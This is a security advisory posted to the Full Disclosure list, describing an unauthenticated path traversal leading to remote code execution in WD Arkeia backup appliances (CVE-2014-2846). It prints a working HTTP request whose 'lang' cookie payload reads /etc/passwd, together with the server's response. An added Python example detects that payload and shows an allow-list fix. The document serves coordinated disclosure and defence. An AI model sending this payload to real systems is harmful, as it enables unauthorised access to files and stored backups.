Date: Wed, 23 Apr 2014 11:16:18 +0300
From: SEC Consult Vulnerability Lab <>
To: <>
Subject: [FD] SEC Consult SA-20140423-0 :: Path Traversal/Remote Code
 Execution in WD Arkeia Network Backup Appliances

SEC Consult Vulnerability Lab Security Advisory < 20140423-0 >
              title: Path Traversal/Remote Code Execution
            product: WD Arkeia Virtual Appliance (AVA)
 vulnerable version: All Arkeia Network Backup releases (ASA/APA/AVA) since 7.0.3.
      fixed version: 10.2.9
         CVE number: CVE-2014-2846
             impact: critical
              found: 2014-03-05
                 by: M. Lucinskij
                     SEC Consult Vulnerability Lab

Vendor description:
"The WD Arkeia virtual appliance (AVA) for backup provides simple, reliable and
affordable data protection for enterprises seeking to optimize the benefits of
virtualization. The AVA offers all the features of the hardware appliance, but
permits you to use your own choice of hardware."


Business recommendation:
The identified path traversal vulnerability can be exploited by unauthenticated
remote attackers to gain unauthorized access to the WD Arkeia virtual appliance
and stored backup data.

SEC Consult recommends restricting access to the web interface of the WD Arkeia
virtual appliance with a firewall until a comprehensive security audit based on
a security source code review has been performed and all identified security
deficiencies have been resolved by the affected vendor.

Vulnerability overview/description:
The WD Arkeia virtual appliance is affected by a path traversal vulnerability.
Path traversal gives attackers access to files and directories outside the
web root through relative file paths supplied in user input.

An unauthenticated remote attacker can exploit the identified vulnerability in
order to retrieve arbitrary files from the affected system and execute system

Proof of concept:
The path traversal vulnerability exists in the
/opt/arkeia/wui/htdocs/index.php script. The value of the "lang" cookie
is not properly checked before it is passed to the PHP include()
function. The following request demonstrates the vulnerability by
retrieving the contents of the /etc/passwd file:

POST /login/doLogin HTTP/1.0
Host: $host
Cookie: lang=aaa..././..././..././..././..././..././etc/passwd%00
Content-Length: 25
Content-Type: application/x-www-form-urlencoded


The response from the affected application:

HTTP/1.1 200 OK
Date: Wed, 05 Mar 2014 08:29:35 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=2ga2peps9eak48ubnkvhf69n40; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: subaction=deleted; expires=Tue, 05-Mar-2013 08:29:34 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Charset: UTF-8
Content-Length: 1217
Connection: close
Content-Type: text/html; charset=UTF-8

ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
ldap:x:55:55:LDAP User:/var/lib/ldap:/sbin/nologin
dhcpd:x:177:177:DHCP server:/:/sbin/nologin
{"local":{"STATUS":["0"],"MESSAGE":["Error code 4, Bad password or

Furthermore, the identified vulnerability can also be exploited to
execute arbitrary PHP code or system commands by including files that
contain specially crafted user input.
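The following is an added detection example, not code from the advisory or from WD Arkeia. It percent-decodes "lang" cookie values the way the application would see them, flags the two traits of the payload above (a null byte and traversal sequences that survive a single pass of "../" removal; that single-pass filter is an assumption drawn from the shape of the payload, not the vendor's actual code), and contrasts it with an allow-list check, which is the fix a defender would want in index.php.

```python
import re
import urllib.parse

# Constructed allow-list: the language codes the application actually ships.
ALLOWED_LANGS = {"en", "fr", "de", "ja"}

TRAVERSAL_RE = re.compile(r"\.\./|\.\.\\")


def naive_strip_traversal(value: str) -> str:
    """Model of a single-pass filter that removes each '../' once (an
    assumption about the flawed check, not the vendor's code). A doubled
    sequence such as '..././' collapses back to '../' after one pass."""
    return value.replace("../", "")


def is_safe_lang(value: str) -> bool:
    """Hardened check: the cookie must exactly match a known language code.
    Anything else is rejected before any filesystem access happens."""
    return value in ALLOWED_LANGS


def classify_cookie(raw_cookie_value: str) -> dict:
    """Decode a raw Cookie header value and report what a WAF/IDS rule or
    log review should flag about it."""
    decoded = urllib.parse.unquote(raw_cookie_value)
    findings = []
    if "\x00" in decoded:
        # %00 truncates the path inside include() on PHP < 5.3.4,
        # discarding any suffix the application appends (e.g. ".php").
        findings.append("null-byte")
    if TRAVERSAL_RE.search(decoded):
        findings.append("traversal")
    if TRAVERSAL_RE.search(naive_strip_traversal(decoded)):
        findings.append("traversal-survives-single-pass-filter")
    return {"value": decoded, "findings": findings, "allowed": is_safe_lang(decoded)}


# Constructed sample cookie values: a benign one, the advisory's payload shape,
# a plain traversal, and a null-byte-only attempt.
SAMPLE_COOKIES = [
    "en",
    "aaa..././..././..././..././..././..././etc/passwd%00",
    "../../etc/passwd",
    "fr%00.php",
]


def scan(cookies=SAMPLE_COOKIES):
    return [classify_cookie(c) for c in cookies]


if __name__ == "__main__":
    for result in scan():
        print(result)
```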

Vulnerable / tested versions:
The vulnerability has been verified to exist in version 10.2.7 of the WD
Arkeia virtual appliance.

According to the vendor all Arkeia Network Backup releases (ASA/APA/AVA) since
7.0.3 are affected.

Vendor contact timeline:
2014-03-13: Contacting vendor through
2014-03-14: Vendor confirms the vulnerability.
2014-03-17: Vendor provides a quick fix and a release schedule.
2014-04-21: Vendor releases a fixed version.
2014-04-23: SEC Consult releases a coordinated security advisory.

Update to the most recent version (10.2.9) of Arkeia Network Backup.

More information can be found at:


Advisory URL:

SEC Consult Vulnerability Lab

SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius

Mooslackengasse 17, 1190 Vienna, Austria
Phone:   +43 1 8903043 0
Fax:     +43 1 8903043 15

Mail: research at sec-consult dot com

Interested to work with the experts of SEC Consult?
Write to

EOF M. Lucinskij / @2014

Sent through the Full Disclosure mailing list